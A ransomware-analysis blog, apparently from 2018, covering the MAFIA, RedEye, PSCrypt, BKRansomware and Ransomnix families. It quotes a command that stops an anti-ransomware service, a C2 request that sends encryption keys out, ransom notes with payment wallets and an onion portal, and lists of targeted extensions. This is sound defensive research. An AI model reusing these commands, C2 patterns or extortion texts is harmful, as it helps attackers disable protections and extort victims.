Sunday, August 12, 2018

MAFIA ransomware targeting users in Korea

A new ransomware family was discovered and sent to me by MalwareHunterTeam, which we'll call MAFIA due to the extension it uses to encrypt files. The ransomware appears to target users in Korea, and may have been developed with at least knowledge of the Korean language.

Another interesting (and new to me) feature is the use of "Onion.Pet", a Tor proxy as a means for C2 (network) communication. Read the analysis below to find out more details on this ransomware. (not to be confused with MafiaWare, a Hidden Tear variant - the MAFIA ransomware described here is unique).


It's currently unknown how the MAFIA ransomware reaches a system, but it's likely delivered via spear-phishing, rather than a manual installation. The binary analysed here has the following properties:

First, MAFIA will attempt to stop a service named "AppCheck" by launching the following command (which will use an elevated CMD prompt):

sc stop AppCheck

Ransomware usually stops database processes, for it to be able to also encrypt database-files which may be in use by said processes. However, in this case, AppCheck is actually a service which belongs to an anti-ransomware product from South-Korea. Figure 1 shows a screenshot of its website.

Figure 1 - "100% Signatureless Anti-Ransomware" -

As for the effectiveness of this software: no idea, but the author deemed it important enough to include it, so either it has proven it works, or it is used by a lot of users and businesses.

The author of the MAFIA ransomware has also left a debug path, which mentions the name "Jinwoo" ("진우" in Korean), and may be an indicator of the developer's nationality.

MAFIA makes use of OpenSSL to encrypt files, which it does with AES-256 in CBC mode. As mentioned earlier, encrypted files will obtain the ".MAFIA" extension. For example; Penguins.jpg becomes Penguins.jpg.MAFIA.

Files with the following extensions (300 in total) will be encrypted:

.3dm, .3ds, .3fr, .3g2, .3gp, .3pr, .ab4, .accdb, .accde, .accdr, .accdt, .ach, .acr, .act, .adb, .ads, .agdl, .ait, .apj, .arw, .asf, .asm, .asp, .asx, .avi, .back, .backup, .backupdb, .bak, .bank, .bay, .bdb, .bgt, .bik, .bkp, .bkp, .blend, .bpw, .cdf, .cdr, .cdr3, .cdr4, .cdr5, .cdr6, .cdrw, .cdx, .ce1, .ce2, .cer, .cfp, .cgm, .cib, .class, .cls, .cmt, .cpi, .cpp, .cr2, .craw, .crt, .crw, .csh, .csl, .csv, .dac, .db-journal, .db3.dbf, .dc2, .dcr, .dcs, .ddd, .ddoc, .ddrw, .dds, .der, .des, .design, .dgc, .djvu, .dng, .doc, .docm, .docx, .dot, .dotm, .dotx, .drf, .drw, .dtd, .dwg, .dxb, .dxf, .dxg, .eml, .eps, .erbsql, .erf, .exf, .fdb, .ffd, .fff, .fhd, .fla, .flac, .flv, .fpx, .fxg, .gray, .grey, .gry, .hbk, .hpp, .ibank, .ibd, .ibz, .idx, .iif, .iiq, .incpas, .indd, .java, .jpe, .jpeg, .jpg, .kc2, .kdbx, .kdc, .key, .kpdx, .lua, .m4v, .max, .mdb, .mdc, .mdf, .mef, .mmw, .moneywell, .mos, .mov, .mp3, .mp4, .mpg, .mrw, .msg, .myd, .ndd, .nef, .nk2, .nop, .nrw, .ns2, .ns3, .ns4, .nsd, .nsf, .nsg, .nsh, .nwb, .nx2, .nx1, .nyf, .oab, .obj, .odb, .odc, .odf, .odg, .odm, .odp, .ods, .odt, .oil, .orf, .ost, .otg, .oth, .otp, .ots, .ott, .p12, .p7b, .p7c, .pab, .pages, .pas, .pat, .pcd, .pct, .pdb, .pdd, .pdf, .pef, .pem, .pfx, .php, .plc, .pot, .potm, .potx, .ppam, .pps, .ppsm, .ppsx, .ppt, .pptm, .pptx, .prf, .psafe3, .psd, .pspimage, .pst, .ptx, .qba, .qbb, .qbm, .qbr, .qbw, .qbx, .qby, .r3d, .raf, .rar, .rat, .raw, .rdb, .rtf, .rw2, .rw1, .rwz, .s3db, .sas7bdat, .say, .sd0, .sda, .sdf, .sldm, .sldx, sqlite, .sqlite3, .sqlitedb, .srf, .srt, .srw, .st4, .st5, .st6, .st7, .st8, .stc, .std, .sti, .stw, .stx, .svg, .swf, .sxc, .sxd, .sxg, .sxi, .sxm, .sxw, .tex, .tga, .thm, .tlg, .txt, .vob, .wallet, .wav, .wb2, .wmv, .wpd, .wps, .xll, .x3f, .xis, .xla, .xlam, .xlk, .xlm, .xlr, .xls, .xlsb, .xlsm, .xlsx, .xlt, .xltm, .xltx, .xlw, .ycbcra, .yuv, .zip, .alz, .jar, .png, .bmp, .a00, .gif, .egg

Note: because the MAFIA ransomware uses OpenSSL for encryption, the process is slow, and the user may be able to interrupt it by killing the process (typically named winlogin.exe), or by shutting down the machine.

Figure 2 shows a side-by-side visual representation of the original (left) and encrypted image (right).

Figure 2 - Comparison (the blue represents ASCII strings)

MAFIA will also create a ransom note in HTML named "Information" in the same location as the original dropper. Ironically enough, the ransom note will also have the ".mafia" extension appended - the file will not be encrypted however.

Figure 3 shows the ransom note, in a browser.

Figure 3 - Ransom note

The text translates from Korean ("고유넘버") as "Unique number", and appears to contain two unique identifiers.

As mentioned earlier, MAFIA will use a Tor proxy for C2 communication; an example request is as follows:

GET /mafiaEgnima.php?iv=0x9e0x4b0x410x5c0x480x3a0xf40x90x2f0xfa0x960xb90x9b0x830xd40xb7&key=0xb90x1e0x600x3d0xef0x6c0xe60x930x6d0xab0x420x7b0x50x350xf00xcd0x3c0x490xc30x5f0xa10xe0xda0x270x5d0xd50xd10xa40xc0x9f0x340x79&seq=cbdf395c9281ae2ec52a306b5c29ec5 HTTP/1.1
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75 Safari/537.36

It appears the ransomware tries to send out an encryption key and IV using an HTTP GET request, which could make it possible to decrypt files, granted the network traffic is inspected at that point.

There's several other binaries of MAFIA out there, such as:


Three of these (119228fb8f4333b1c10ff03543c6c0ea, 0776e348313c7680db86ed924cff10b8 and 6487edd9b1e7cf6be4a9b1ac57424548) have a different C2 server, specifically:

Neither of these servers appeared to be online at time of writing.

Decryption is possible thanks to Michael Gillespie (@demonslay335).

Download the decrypter from:

In case of questions or feedback, be sure to leave a comment.


Wednesday, June 6, 2018

RedEye ransomware: there's more than meets the eye

A rather anonymous account reached out to me on Twitter asking to check out a "scary & really nasty" sample.

It turned out to be RedEye ransomware, a new strain or variant by the same creator of Annabelle ransomware, which I discovered in February earlier this year.


This ransomware is named "RedEye" by the author "iCoreX".


The first noticeable thing about this file is the huge filesize: 35.0 MB (36657152 bytes). This is due to several media files, specifically images and audio files, embedded in the binary.

It contains three ".wav" files:
  • child.wav
  • redeye.wav
  • suicide.wav
All three audio files play a "creepy" sound, intended to scare the user. 

Additionally, the binary is protected with ConfuserEx, compression, and a few other tricks. It also embeds another binary, which is responsible for replacing the MBR, which has the following properties:

  • MD5: 878a10cda09fec2cb823f2b7138b550e
  • SHA1: db44dae60c12853cdbe62ec9f7b3493a897e519a
  • SHA256: f96ed49ab1a5b4e2333fee30c42b2ae28dc5bc74fa02b9c6989e5c0159cfffd7
  • Compilation timestamp (Delphi): 1992-06-19 22:22:17
  • Compilation timestamp (Actual): 2018-06-04 14:23:36
  • VirusTotal report:

What actually happens when executing this ransomware? Just like Annabelle ransomware it will perform a set of actions to make removal quite difficult, for example; it will disable task manager and in this iteration, will also hide your drives.

Similar to before, a ransom message is then displayed as follows:

Figure 1 - RedEye Ransomware

The message reads:

All your personal files has been encrypted with an very strong key by RedEye!
(Rijndael-Algorithmus -  AES - 256 Bit)
The only way to get your files back is:
- Go to http://redeye85x9tbxiyki.onion/tbxIyki - Enter your Personal ID
and pay 0.1 Bitcoins to the adress below! After that you need to click on
 "Check Payment". Then you will get a special key to unlock your computer.
You got 4 days to pay, when the time is up,
then your PC will be fully destroyed!

The ransomware has several options which I won't be showing here, but in short, it can:

  • Show encrypted files
  • Decrypt files
  • Support
  • Destroy PC

The Destroy PC option shows a GIF as background where you have the option to select "Do it" and "Close". I won't display the image however.

RedEye claims to encrypt files securely with AES256. On my machine, it appears to overwrite or fill files with 0 bytes, rendering the files useless, and appending the ".RedEye" extension.

The machine will, when the time runs out or when the "Do it" option is selected, reboot and replace the MBR, again similar to Annabelle ransomware, with the following message:

Figure 2 - MBR lock screen

The message reads as follows:

RedEye Terminated your computer! 
The reason for that could be:
- The time has expired
- You clicked on the 'Destroy PC' button
There is no way to fix your PC! Have Fun to try it :)
My YouTube Channel: iCoreX <- :p="" br="" subscribe="">Add me on discord!iCoreX#3333 <- account="" amp="" annabelle="" by="" creator="" discord.="" discord="" got="" i="" icorex="" jigsaw="" my="" named="" of="" old="" ransomware="" redeye="" terminated="">

The author, iCoreX, claims to have created Jigsaw, Annabelle, and now the RedEye ransomware - whether the former is true or not, I'll leave in the middle.

Details on the ransomware:

Extension: .RedEye
BTC Wallet: 1JSHVxXnGDydVXVamFW9AEmk3vk8cF8Vuj
Payment portal: (currently offline): http://redeye85x9tbxiyki[.]onion

Currently, it doesn't appear any payments have been made as of yet:


You may be able to restore the MBR, or your files, if you catch the ransomware in the act, and shutdown the machine at that point. Reboot in safe mode and copy over or back-up your files.

If tools such as the registry editor are not working, run Rkill in safe mode first.

Then, Restore the MBR, and reinstall Windows.

You may also try to restore the MBR first, and consequently attempt to restore files using Shadow Volume Copies. For example, a tool such as Shadow Explorer can be of assistance, or read the tutorial here.

If that doesn't work either, you may try using a data recovery program such as PhotoRec or Recuva


While it appears that the RedEye ransomware has even more tricks up its sleeve than its predecessor Annabelle, the same conclusion holds true: do not pay the ransomware.

As for the actual purpose of the ransomware: it may be considered a ransomware of the wiper kind, however, it appears the author likes to showcase his or her skill.

You can read more on the purpose of ransomware here.


Monday, May 7, 2018

PSCrypt ransomware: back in business

PSCrypt is ransomware first discovered last year, in 2017, targeting users and organisations alike in Ukraine, and the malware itself is based on GlobeImposter ("GI") ransomware.

I've written about PSCrypt in the past, when it was distributed via Crystal Finance Millenium's hacked website: Crystal Finance Millennium used to spread malware

In this quick blog post, we'll take a look at the latest iteration of PSCrypt.


A file named "xls.scr", which sports a fancy "energy" or "power" icon is responsible for loading PSCrypt on the machine, and was spread via a phishing campaign.

Figure 1 - Icon

The ransomware has the following properties:

As mentioned earlier, PSCrypt is based on GlobeImposter and as such, has very similar functionality.

The following folders are excluded from being encrypted:

Avast, Avira, COMODO, Chrome, Common Files, Dr.Web, ESET, Internet Explorer, Kaspersky Lab, McAfee, Microsoft, Microsoft Help, Microsoft Shared, Microsoft.NET, Movie Maker, Mozilla Firefox, NVIDIA Corporation, Opera, Outlook Express, ProgramData, Symantec, Symantec_Client_Security, Windows, Windows App Certification Kit, Windows Defender, Windows Kits, Windows Mail, Windows Media Player, Windows Multimedia Platform, Windows NT, Windows Phone Kits, Windows Phone Silverlight Kits, Windows Photo Viewer, Windows Portable Devices, Windows Sidebar, WindowsPowerShell, Wsus, YandexBrowser, ntldr, spytech software, sysconfig, system volume information

This iteration of PSCrypt will encrypt all files, including executables, except those files with the following extensions:


As usual, a temporary batch file will be used to clear Volume Shadow Copies as well as Event Logs:

Figure 2 - Batch file

What's new in this iteration of PSCrypt is not only the changes implemented by/via GlobeImposter ransomware, but also the ransom note itself, as noted in Figure 3 and 4 below:

Figure 3 - Ransomware note, part 1

Figure 4 - Ransomware note, part 2

The title of the ransom note is "Ваші файли тимчасово зашифрувати! Не хвилюйтесь!", which translates to "Your files are temporarily encrypted! Do not worry!".

The Ukrainian version is rather lenghty, and is as follows:

Для відновлення даних потрібно дешифратор.
Щоб отримати дешифратор, ви повинні, оплатити послуги розшифровки:
Оплата відбувається за коштами біткойн на кошелек № 1EoWxYTt7xCskTxjm47E2XNxgkZv1anDP9
Вартість послуги складає 150$
Оплату можна провести в терміналі IBox. або виберіть один з обмінних сайтів на сторінці - (приклад обмін Приват24 на BTC) також можете скористатися послугами
Додаткова інформація:
Програма можемо дешифрувати один файл як доказ того, що у неї є декодер. Для цього необхідно надіслати зашифрований файл - вагою не більше 2 mb, и ваш уникальный идентификационный код, на пошту:
Более детальная инструкция по оплате:
Всі файли розшифровуються тільки після 100% оплати
Ви дійсно отримуєте дешифратор після оплати
Не намагайтеся видалити програму або запустити антивірусні інструменти це може ускладнити вам роботу
Спроби самодешіфрованія файлів приведуть до втрати ваших даних
Декодери інших користувачів не сумісні з вашими даними, оскільки унікальний ключ шифрування кожного користувача.
За запитом користувачів, надаємо контакти клієнтів, які вже користувалися послугами нашого сервісу.
Додаткові контакти: - (якщо відповіді не прийшло після 24-х годин) - (якщо відповіді не прийшло після 24-х годин) - (якщо відповіді не прийшло після 24-х годин)
З повагою
Unlock files LLC
33530 1st Way South Ste. 102
Federal Way, WA 98003
United States

Google Translation, so pretty loose - I've made some minor corrections however:

To restore data you need a decoder.
To receive a decoder, you must pay for decoding services:
Payment is made at the expense of bitcoin to wallet number 1EoWxYTt7xCskTxjm47E2XNxgkZv1anDP9
Service cost is $ 150
Payment can be made at the terminal IBox. or select one of the exchange sites on the page - (example exchange of Privat24 to the BTC), you can also use the services of
Additional Information:
The program can decrypt one file as proof that it has a decoder. To do this, you need to send an encrypted file weighing no more than 2 mb and your unique identification code by mail:
More detailed payment instructions:
All files are decrypted only after 100% payment
You really get a decoder after payment
Do not try to uninstall a program or run antivirus tools, which can complicate your work
Attempts to self-decrypt files will result in the loss of your data
Other users' decoders are not compatible with your data, as the unique encryption key for each user.
At the request of users, we provide contact with customers who have already used the services of our service.
Additional contacts: - (if the answer did not arrive after 24 hours) - (if the answer did not arrive after 24 hours) - (if the answer did not arrive after 24 hours)

The English version is rather short and to the point:

For decoding, write to the - Basic - backup Additional contacts: - (if the answer did not arrive after 24 hours) - (if the answer did not arrive after 24 hours) - (if the response did not arrive after 24 hours) 

The cost for restoring service is, interestingly enough, expressed in US dollars this time ($150), as opposed to Ukrainian currency in a previous iteration.

However, the images which included IBox instructions (as payment method) have been removed, and while IBox is still suggested as a service, there's also a new website introduced to pay via Bitcoin using E-BTC. 

E-BTC is a Ukrainian service which is "the most reliable and simple service for buying and selling Bitcoins and also the best partner for entering and withdrawing funds to the WEX stock exchange."

It also promises full anonymity.

Back to the ransomware. Encrypted files will have the .docs extension appended, for example Jellyfish.jpg becomes

Ransom note: .docs document.html
BTC Wallet: 1EoWxYTt7xCskTxjm47E2XNxgkZv1anDP9

Extension: .docs

Fortunately, it appears no payments have been made as of yet: 1EoWxYTt7xCskTxjm47E2XNxgkZv1anDP9


The last iteration of PSCrypt was observed in 2017, but it appears it has now returned to try and coerce users and organisations to pay the ransomware.

As usual, follow the prevention tips here to stay safe, but the rule of thumbs are as always:

  • Do not pay, unless there is imminent danger of life
  • Create regular backups, and do not forget to test if they work

IOCs follow below.


Saturday, May 5, 2018

Vietnamese ransomware wants you to add credit to a mobile phone

In this quick blog post we'll have a look at BKRansomware, a Vietnamese ransomware that wants you to top up its phone.

Update: 2018-05-06, scroll down for the update, added to the conclusion.


This ransomware is named "BKRansomware" based on the file name and debug path. Properties:

BKRansomware will run via command line and displays the following screen:

Figure 1 - Ransom message

The ransomware message is very brief, and displays:

send 50k viettel to 0963210438 to restore your data

Viettel is a form of credit for mobile phones, used in Vietnam and neighboring countries. It is part of "Viettel Group" (Tập đoàn Công nghiệp Viễn thông Quân đội in Vietnamese), a mobile network operator in Vietnam. (Wiki link). 

As such, it appears the creators are in desperate need of more credit so they can make calls again :)

It only encrypts a small amount of extensions:

Figure 2 - extensions to encrypt

The list is as follows:

.txt, .cpp, .docx, .bmp, .doc, .pdf, .jpg, .pptx, .png, .c, .py, .sql

Encrypted files will have the .hainhc extension appended. Fun note: files aren't actually encrypted, but encoded with ROT23. For example, if you have a text file which says "password", the new content or file will now have "mxpptloa" instead.

Noteworthy is the debug path: 

C:\Users\Gaara\Documents\Visual Studio 2013\Projects\BKRansomware-20180503T093651Z-001\BKRansomware\Release\BKRansomware.pdb

The extension mentioned above, "hainhc" may refer to the following handle or persona on Whitehat VN, a Vietnamese Network security community:


While BKRansomware is not exactly very sophisticated, it is able to encrypt (or rather encode) files, and is unique in the sense that it asks you to top up a mobile phone.

Update: it appears this is a ransomware supposedly used for testing purposes, for both coding and testing VirusTotal detections. However, there seems to be a lot of "testing" going on, including keyloggers. Draw your own conclusions.

Follow the prevention tips here to stay safe.


Saturday, April 28, 2018

Ransomnix ransomware variant encrypts websites

Ransomnix is a (supposedly Jigsaw, but not really) ransomware variant that holds websites for ransom, and encrypts any files associated with the website.

This ransomware was discovered in the second half of 2018, and there's a brief write-up by Amigo-A here as well: Ransomnix ransomware

In this blog post, we'll discuss a newer variant.


Several encrypted websites were discovered, which display the following message:

Figure 1 - Ransom message, part 1

Figure 2 - Ransom message, part 2

The full message is as follows:

Now Pay 0.2 BTC
Payment will increase by
BTC each day after
Your Key Will Be Deleted
Your Bill till now 2.4000000000000004 BTC
Dear manager, on
Fri Apr 06 2018 02:08:34 GMT+0100 (GMT Summer Time)
your database server has been locked, your databases files are encrypted
and you have unfortunately "lost" all your data, Encryption was produced using
unique public key RSA-2048 generated for this server.
To decrypt files you need to obtain the private key.
All encrypted files ends with .Crypt
Your reference number: 4027
To obtain the program for this server, which will decrypt all files,
you need to pay 0.2 bitcoin on our bitcoin address 1VirusnmipsYSA5jMv8NKstL8FkVjNB9o (today 1 bitcoin was around 15000 $).
After payment send us your number on our mail and we will send you decryption tool (you need only run it and all files will be decrypted during a few hours depending on your content size).
Before payment you can send us one small file (100..500 kilobytes) and we will decrypt it!
It's your guarantee that we have decryption tool. (use your reference number as a subject to your message)
We don't know who are you, All what we need is some money.
Don't panic if we don't answer you during 24 hours. It means that we didn't received your letter and write us again.
You can use one of that bitcoin exchangers for transfering bitcoin.
You dont need install bitcoin programs - you need only use one of this exchangers or other exchanger that you can find in for your country.
Please use english language in your letters. If you don't speak english then use to translate your letter on english language.
You do not have enough time to think each day payment will increase by
0.1 BTC and after one week your privite key will be deleted and your files will be locked for ever.

People use cryptocurrency for bad choices,
 but today you will have to use it to pay for your files!
 It's your choice!

The following JavaScript is responsible for keeping track of the price, and increasing it:

Figure 3 - JS function

The starting price is set at 0.2 BTC, but will increase every day with 0.1 BTC thanks to two functions: inprice and startTimer.
The function for calculating the time and date, startTimer, is a copy/paste from the following StackOverflow answer: The simplest possible JavaScript countdown timer?

Note that the start_date variable, 1522976914000, is the epoch timestamp in milliseconds, which converted is indeed Friday 6 April 2018 01:08:34, as mentioned in the ransom note.

Ransomware message details:

BTC Wallet: 1VirusnmipsYSA5jMv8NKstL8FkVjNB9o
Extension: .Crypt

Files will be encrypted, as claimed by the cybercriminals, with RSA-2048.

Unfortunately, it appears several people have already paid for decryption: 1VirusnmipsYSA5jMv8NKstL8FkVjNB9o


If possible, restore the website from a backup, and consequently patch your website, this means: install all relevant and security patches for your CMS, and plugins where applicable.

Then, change all your passwords. Better be safe than sorry.

It is currently unknown if decryption is possible. If you have an example of an encrypted file, please do upload it to ID Ransomware and NoMoreRansom, to see if decryption is possible, or if a decryptor can be developed.


For preventing ransomware that attacks your websites, you can follow my prevention tips here.

General ransomware prevention tips can be found here.


Ransomware can in theory be installed on everything; whether it's your machine, your website, or your IoT device. Follow the prevention tips above to stay safe.

Remember: create backups, regularly, and test them as well.